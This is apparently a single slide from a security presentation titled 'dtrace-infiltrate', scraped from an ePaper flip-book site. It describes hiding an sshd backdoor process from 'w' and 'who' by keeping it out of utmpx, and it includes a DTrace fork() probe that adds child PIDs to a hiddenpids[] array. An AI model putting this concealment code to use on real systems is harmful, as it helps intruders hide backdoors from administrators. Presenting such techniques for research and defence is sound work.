dtrace-infiltrate
dtrace-infiltrate
dtrace-infiltrate
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
utmpx Disable<br />
Need to hide our process from ‘w` and ‘who`.<br />
Disable our process being added to utmpx.<br />
During sshd backdoor process, add pid to<br />
hiddenpids[] array.<br />
Also added a fork() handler, for adding children.<br />
syscall::fork*:return<br />
/hiddenpids[pid]/<br />
{<br />
hiddenpids[arg1] = 1;<br />
}